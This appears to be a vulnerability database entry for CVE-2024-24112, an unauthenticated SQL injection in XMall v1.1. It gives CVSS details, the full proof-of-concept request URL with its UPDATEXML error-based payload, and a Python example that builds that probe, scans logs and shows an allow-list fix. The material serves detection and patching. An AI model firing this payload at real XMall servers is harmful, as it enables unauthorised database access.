cbcvebase.
CVE-2024-24112
published 2024-02-06

CVE-2024-24112: xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.

Priority: P2 (60) · Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public PoC available (see Detection & IOCs)
EPSS: 3.35% (87.2 percentile)

Affected (1 range)

Vendor: exrick · Product: xmall · Version range: not listed · Fixed in: not listed

Detection & IOCs (extracted from sources)

url: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1
path: /item/list
command: desc)a+union+select+updatexml(1,concat(0x7e,<md5>,0x7e),1)%23
other: app="XMall-后台管理系统" (fingerprint query; the suffix means "backend management system")
  • Match condition: the response body contains both the MD5 hash of the random integer and the string 'MySQLSyntaxErrorException'. Together these confirm error-based SQL injection through the orderDir parameter, since UPDATEXML() echoes the injected marker back inside the MySQL XPath error message.
  • The vulnerable endpoint is GET /item/list; the injection point is the DataTables order[0][dir] parameter (URL-encoded as order%5B0%5D%5Bdir%5D), which the application maps to orderDir. The payload breaks out of the ORDER BY clause with a closing parenthesis and an alias, then appends UNION SELECT with UPDATEXML for error-based data extraction.
  • The vulnerability is unauthenticated (PR:N) and network-reachable (AV:N): no session cookie or authentication token is required to trigger the injection.
  • HTTP status 200 is returned even on successful exploitation, so detection must inspect the response body rather than rely on error-level status codes.
  • The exploit uses a randomly generated integer (rand_int in the range 9000000–9999999) whose MD5 hash is embedded in the payload and matched in the response body, so every probe is unique. Static signatures must key on the invariant part of the payload (the ORDER BY breakout and UPDATEXML call), not on the marker.
  • The affected version is XMall v1.1; the CPE is cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*. Scope version-based detections accordingly.
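The detection logic described in the bullets above, as an added example: this is not code from the page, from the PoC, or from the XMall project. It builds a probe the way the PoC does (random integer, MD5 marker, ORDER BY breakout into UPDATEXML), applies the body-match rule (marker plus 'MySQLSyntaxErrorException', ignoring the status code), and runs an allow-list check over the order[0][dir] / orderDir values found in constructed combined-format access log lines. The `safe_order_dir` function shows the server-side fix pattern (allow-listing the sort direction, since ORDER BY direction cannot be a bind parameter); that pattern is an assumption about how such a bug is fixed, not the vendor's patch.

```python
"""Probe construction, response match and log detection for CVE-2024-24112
(XMall v1.1, error-based SQLi via DataTables order[0][dir] -> orderDir).
Added example; not code from the page, the PoC or the XMall project.
Log lines and response bodies below are constructed for illustration."""
import hashlib
import random
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, quote, urlsplit

VULN_PATH = "/item/list"
MYSQL_ERR = "MySQLSyntaxErrorException"

# Invariant part of the payload: ')' closing the ORDER BY expression, an
# optional alias ("a" in the PoC), then UNION or UPDATEXML(.
INJECT_RE = re.compile(r"\)\s*\w*\s*(union\b|updatexml\s*\()", re.IGNORECASE)


def build_probe(rand_int: Optional[int] = None) -> Tuple[str, str]:
    """Return (md5_marker, request_target) for one unique probe, mirroring the
    PoC: MD5 of a random 7-digit integer, wrapped in 0x7e ('~'), leaked through
    UPDATEXML()'s invalid-XPath error message."""
    if rand_int is None:
        rand_int = random.randint(9000000, 9999999)
    marker = hashlib.md5(str(rand_int).encode()).hexdigest()
    injected_dir = f"desc)a union select updatexml(1,concat(0x7e,{marker},0x7e),1)#"
    query = (
        "draw=1&order%5B0%5D%5Bcolumn%5D=1"
        f"&order%5B0%5D%5Bdir%5D={quote(injected_dir, safe='')}"
        "&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1"
    )
    return marker, f"{VULN_PATH}?{query}"


def response_indicates_exploit(body: str, marker: str) -> bool:
    """Page's match rule: marker AND MySQL error class present in the body.
    The HTTP status is deliberately not consulted (the app returns 200)."""
    return marker in body and MYSQL_ERR in body


def classify_request(request_line: str) -> str:
    """Classify 'GET /path?query HTTP/1.1' as benign, anomalous or sqli.
    anomalous = sort direction outside the asc/desc allow-list;
    sqli = the ORDER BY breakout pattern used by the PoC."""
    parts = request_line.split()
    if len(parts) < 2:
        return "benign"
    url = urlsplit(parts[1])
    if url.path != VULN_PATH:
        return "benign"
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %5B -> [
    for value in params.get("order[0][dir]", []) + params.get("orderDir", []):
        if INJECT_RE.search(value):
            return "sqli"
        if value.strip().lower() not in ("asc", "desc"):
            return "anomalous"
    return "benign"


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Run classify_request over combined-format access log lines; return
    (client_ip, verdict) for every non-benign line."""
    hits = []
    for line in lines:
        m = re.search(r'"([^"]*)"', line)  # the quoted request line
        if not m:
            continue
        verdict = classify_request(m.group(1))
        if verdict != "benign":
            hits.append((line.split()[0], verdict))
    return hits


def safe_order_dir(value: str) -> str:
    """Fix pattern (assumption, not the vendor's patch): allow-list the sort
    direction instead of concatenating the raw string into ORDER BY."""
    normalized = value.strip().upper()
    if normalized not in ("ASC", "DESC"):
        raise ValueError(f"invalid sort direction: {value!r}")
    return normalized


# Constructed sample log: benign sort, the PoC probe, an allow-list
# violation, and an unrelated request.
_PROBE_MARKER, _PROBE_URL = build_probe(9123456)
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Feb/2024:10:00:01 +0000] "GET /item/list?draw=1'
    '&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc&start=0&length=10 HTTP/1.1" 200 812',
    f'10.0.0.5 - - [06/Feb/2024:10:00:02 +0000] "GET {_PROBE_URL} HTTP/1.1" 200 1290',
    '10.0.0.7 - - [06/Feb/2024:10:00:03 +0000] "GET /item/list?draw=2'
    '&order%5B0%5D%5Bdir%5D=desc,name HTTP/1.1" 200 700',
    '10.0.0.9 - - [06/Feb/2024:10:00:04 +0000] "GET /login HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, verdict in scan_log(SAMPLE_LOG):
        print(ip, verdict)
```

The classifier keys on the invariant breakout pattern rather than the per-probe MD5 marker, which is why it still fires on a fresh `build_probe()` output; the allow-list branch additionally surfaces any non asc/desc direction, which is the cheaper signal to alert on in a WAF or SIEM rule.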

CVSS provenance

NVD (v3.1): 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_oracle: 8.1 HIGH